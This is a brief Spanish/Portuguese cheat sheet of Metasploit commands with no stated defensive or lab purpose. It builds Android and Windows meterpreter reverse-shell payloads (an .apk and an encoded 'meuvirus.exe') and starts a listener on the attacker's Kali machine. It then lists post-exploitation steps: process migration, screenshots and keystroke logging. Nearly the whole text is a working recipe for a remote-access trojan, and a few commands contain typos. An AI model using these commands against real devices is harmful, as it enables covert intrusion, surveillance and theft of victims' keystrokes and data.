Comando #1
/************* chequear ip *********************/
#1.- ifconfig
/************ Abrir Metasploit *****************/
/************ Iniciar console **************/
#2.- msfconsole
/************ Conectar a base de dados *********/
#3.- db_connect
/************ utilizar payload ***************/
msfpayload android/meterpreter/reverse_tcp LHOST=(ip-do-kali) LPORT=4444 R > (nome do arquivo com extenção.apk)
/*********** executar exploit *****************/
msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=(ip-do-kalio) LPORT=4444 E
/********** ver todos los comando que *****************/
Comando #2
msfvenom -p windows/meterpreter/reverse_tcp lhost=(IPDOKALI) lport=4444 -e cmd/powershell_base64 -i 5 -f exe > /root/Desktop/meuvirus.exe
Comandos:
msfconsole
use exploit/multi/handler
set payload windows/meterprete/reverse_tcp
set lhost(IPDOKALI)
set lport 4444
exploit
sysinfo (Informaçoes do Sistema)
ps (Process List)
migrate 1172 (explore.exe)
ls (Lista os DIretorios)
help
screenshot (Tirar Print)
keyscan_start (Teclas Digitadas)